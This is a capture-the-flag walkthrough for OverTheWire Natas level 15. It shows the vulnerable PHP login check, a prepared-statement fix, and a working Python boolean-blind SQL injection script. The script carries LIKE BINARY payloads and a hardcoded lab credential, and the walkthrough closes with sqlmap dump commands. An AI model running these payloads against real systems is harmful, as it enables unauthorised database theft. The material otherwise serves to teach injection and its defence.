We open level 15 and look at the page.
There is a query box that checks whether a username exists.
Try natas15.
The result says the user does not exist.
Let's look at the source.
The source is as follows:
```php
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }
    $res = mysqli_query($link, $query);
    if($res) {
        if(mysqli_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }
    mysqli_close($link);
} else {
?>
```
A rough analysis of what the source does:
1. It queries whether the user exists, concatenating the `username` parameter straight into the SQL string.
2. It only shows "exists" / "doesn't exist" / "Error in query" on the front end, so the response is a yes/no oracle rather than actual data.
An expert's script:
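For comparison, here is how the same existence check looks once the query is built with a prepared statement. This is an added example, not the Natas source: the connection credentials are placeholders, and the function name `user_exists` is my own.

```php
<?php
// Added example (not the Natas code): the username is bound as a parameter,
// so it is sent to MySQL as data and cannot change the SQL text.
// Connection details are placeholders, not the real natas15 values.

function user_exists(mysqli $link, string $username): bool
{
    // The SQL text is fixed; "?" is a bound parameter, not string concatenation.
    $stmt = $link->prepare('SELECT 1 FROM users WHERE username = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $link->error);
    }
    $stmt->bind_param('s', $username);  // "s" = bind as a string value
    $stmt->execute();
    $stmt->store_result();
    $found = $stmt->num_rows > 0;
    $stmt->close();
    return $found;
}

if (array_key_exists('username', $_REQUEST)) {
    // Make mysqli throw mysqli_sql_exception instead of returning false silently.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $link = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASSWORD_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');
    try {
        echo user_exists($link, $_REQUEST['username'])
            ? "This user exists.<br>"
            : "This user doesn't exist.<br>";
    } catch (mysqli_sql_exception $e) {
        // Log the detail server-side; never echo the query or the driver message
        // (the original "?debug" output is exactly what makes injection easy to tune).
        error_log('user lookup failed: ' . $e->getMessage());
        echo "Error in query.<br>";
    }
    $link->close();
}
```

Two things to notice: the `LIKE BINARY` trick in the script below depends on the attacker controlling the SQL text, which the bound parameter removes entirely; and the page is still a username-existence oracle even after the fix, so if enumeration of usernames matters, the response should not distinguish between the two outcomes either.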
```python
import requests
from requests.auth import HTTPBasicAuth

# Candidate characters: the natas16 password is alphanumeric.
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''  # characters confirmed to occur somewhere in the password
passwd = ''    # password recovered so far (left to right)

# Step 1: find which characters appear in the password at all.
# LIKE BINARY makes the comparison case-sensitive; "#" comments out the closing quote.
for char in chars:
    Data = {'username': 'natas16" and password LIKE BINARY "%' + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug',
                      auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
                      data=Data)
    if 'exists' in r.text:  # "This user exists." => the LIKE matched
        filtered = filtered + char

# Step 2: extend the known prefix one character at a time (the password is 32 chars).
for i in range(0, 32):
    for char in filtered:
        Data = {'username': 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
        r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug',
                          auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
                          data=Data)
        if 'exists' in r.text:
            passwd = passwd + char
            print(passwd)
            break
```
We modify it slightly and run it in VS.
Wait for the result.
Record the password.
Verify the password.
Let's try a different approach:
use sqlmap for the blind injection.
The payload used is:
```
index.php?debug=1&username=1" or 1 -- +
```
Then capture the request and save it to a file.
Run sqlmap against the saved request for the blind injection:
```shell
python sqlmap.py -r natas16.txt --random-agent --dbms=mysql --level=3 -p username --dump
python sqlmap.py -r natas16.txt --random-agent -p username -D natas15 -T users -C username,password --dump
```
Wait for the result.
It timed out; try a few more times.